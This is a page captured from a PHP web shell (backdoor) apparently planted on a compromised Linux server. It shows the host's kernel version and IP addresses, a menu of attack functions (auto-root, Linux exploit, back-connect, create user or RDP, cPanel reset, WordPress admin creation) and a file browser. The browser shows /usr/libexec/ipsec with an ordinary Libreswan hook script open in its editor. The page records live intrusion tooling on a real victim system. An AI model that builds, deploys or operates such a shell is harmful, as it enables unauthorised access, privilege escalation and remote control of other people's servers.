Linux server.flyproject.com.br 3.10.0-1160.el7.x86_64 #1 SMP Mon Oct 19 16:18:59 UTC 2020 x86_64
Apache
: 207.244.227.86 | : 216.73.217.1
10 Domain
7.1.33
hubnog
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
ipsec /
[ HOME SHELL ]
Name
Size
Permission
Action
_import_crl
154.26
KB
-rwxr-xr-x
_keycensor
1.38
KB
-rwxr-xr-x
_plutorun
2.98
KB
-rwxr-xr-x
_secretcensor
1.86
KB
-rwxr-xr-x
_stackmanager
14
KB
-rwxr-xr-x
_unbound-hook
1.97
KB
-rwxr-xr-x
_updown
4.23
KB
-rwxr-xr-x
_updown.klips
18.3
KB
-rwxr-xr-x
_updown.netkey
23.31
KB
-rwxr-xr-x
addconn
210.56
KB
-rwxr-xr-x
algparse
345.43
KB
-rwxr-xr-x
auto
5.74
KB
-rwxr-xr-x
barf
11.82
KB
-rwxr-xr-x
cavp
346.02
KB
-rwxr-xr-x
enumcheck
85.1
KB
-rwxr-xr-x
eroute
93.81
KB
-rwxr-xr-x
klipsdebug
69.61
KB
-rwxr-xr-x
look
4.2
KB
-rwxr-xr-x
newhostkey
3.23
KB
-rwxr-xr-x
pf_key
69.18
KB
-rwxr-xr-x
pluto
1.37
MB
-rwxr-xr-x
readwriteconf
182.2
KB
-rwxr-xr-x
rsasigkey
159.04
KB
-rwxr-xr-x
setup
5.58
KB
-rwxr-xr-x
show
3.46
KB
-rwxr-xr-x
showhostkey
159.3
KB
-rwxr-xr-x
spi
346.27
KB
-rwxr-xr-x
spigrp
85.76
KB
-rwxr-xr-x
tncfg
130.14
KB
-rwxr-xr-x
verify
12.04
KB
-rwxr-xr-x
whack
137.93
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _unbound-hook
#!/usr/bin/python # # Copyright (C) 2018 Paul Wouters <pwouters@redhat.com> # # This program is free software; you can redistribute it and/or modify it # under the terms of the GNU General Public License as published by the # Free Software Foundation; either version 2 of the License, or (at your # option) any later version. See <http://www.fsf.org/copyleft/gpl.txt>. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY # or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License # for more details. import sys import subprocess # Get my %defaultroute IP address myip = subprocess.check_output("ip -o route get 8.8.8.8", shell=True) myip = myip.split("src")[1].strip().split()[0] argv = sys.argv ourself = argv.pop(0) try: qname = argv.pop(0) ttl = argv.pop(0) ip = argv.pop(0) except: sys.exit("Bad arguments to ipsec _unbound") while (argv != []): try: gwprec = argv.pop(0) gwtype = argv.pop(0) gwalg = argv.pop(0) gwid = argv.pop(0) pubkey = argv.pop(0) addkeyip = "ipsec whack --keyid @%s --addkey --pubkeyrsa 0s%s"%(ip, pubkey) addkeyhostname = "ipsec whack --keyid @%s --addkey --pubkeyrsa 0s%s"%(qname, pubkey) print("processing an IPSECKEY record for Opportunistic IPsec to %s(%s)"%(qname,ip)) print(subprocess.call(addkeyip, shell=True)) print(subprocess.call(addkeyhostname, shell=True)) except: sys.exit("failed to process an IPSECKEY record for Opportunistic IPsec to %s(%s)"%(qname,ip)) # done injecting all IPSECKEY records into pluto - try actual OE now cmdoeip = "ipsec whack --oppohere %s --oppothere %s"%(myip, ip) print(subprocess.check_output(cmdoeip, shell=True)) #cmdoeqname = "ipsec whack --oppohere %s --oppothere %s"%(myip, qname) #ret, output = commands.getstatusoutput(cmdoeqname) print(subprocess.check_output("ipsec whack --trafficstatus", shell=True))
Close